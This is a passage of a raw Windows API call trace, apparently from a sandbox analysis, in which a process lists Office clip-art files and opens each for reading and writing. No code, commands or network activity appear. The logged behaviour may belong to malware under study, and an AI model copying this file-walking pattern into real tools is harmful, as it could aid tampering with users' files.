dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0103.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0103.773] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.773] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.773] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb96, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="CUP.WMF", cAlternateFileName="")) returned 1 [0103.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0103.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0103.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0103.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0103.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0103.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0103.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0103.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0103.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0103.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0103.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0103.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0103.773] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.773] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.773] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.773] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0103.773] AreFileApisANSI () returned 1 [0103.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF", lpUsedDefaultChar=0x0) returned 64 [0103.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0103.774] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.774] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0103.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0103.774] AreFileApisANSI () returned 1 [0103.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0103.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0103.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 64 [0103.774] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cup.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.774] GetFileType (hFile=0x368) returned 0x1 [0103.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0103.774] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.775] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.775] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.775] CloseHandle (hObject=0x368) returned 1 [0103.775] AreFileApisANSI () returned 1 [0103.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0103.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0103.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e718, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 64 [0103.775] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cup.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.775] GetFileType (hFile=0x368) returned 0x1 [0103.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0103.776] CloseHandle (hObject=0x368) returned 1 [0103.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0103.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0103.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0103.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0103.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0103.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0103.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.777] AreFileApisANSI () returned 1 [0103.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0103.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0103.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e718, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 64 [0103.777] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cup.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb96)) returned 1 [0103.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0103.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0103.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0103.777] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.777] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.777] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2856, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="CUPINST.WMF", cAlternateFileName="")) returned 1 [0103.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0103.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0103.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0103.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0103.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0103.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0103.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0103.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0103.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0103.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0103.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0103.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0103.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0103.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0103.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0103.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.778] AreFileApisANSI () returned 1 [0103.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF", lpUsedDefaultChar=0x0) returned 68 [0103.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0103.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0103.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0103.778] AreFileApisANSI () returned 1 [0103.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0103.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82208 [0103.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 68 [0103.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cupinst.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.779] GetFileType (hFile=0x368) returned 0x1 [0103.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0103.779] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.779] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.779] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.780] CloseHandle (hObject=0x368) returned 1 [0103.780] AreFileApisANSI () returned 1 [0103.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0103.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82298 [0103.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x82298, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 68 [0103.780] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cupinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.780] GetFileType (hFile=0x368) returned 0x1 [0103.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82298 | out: hHeap=0x20000) returned 1 [0103.780] CloseHandle (hObject=0x368) returned 1 [0103.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0103.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0103.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0103.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0103.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0103.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0103.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0103.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0103.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0103.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0103.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0103.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0103.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0103.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0103.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.782] AreFileApisANSI () returned 1 [0103.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0103.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x81fc8 [0103.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x81fc8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 68 [0103.782] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cupinst.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2856)) returned 1 [0103.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81fc8 | out: hHeap=0x20000) returned 1 [0103.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0103.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0103.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0103.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.782] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, 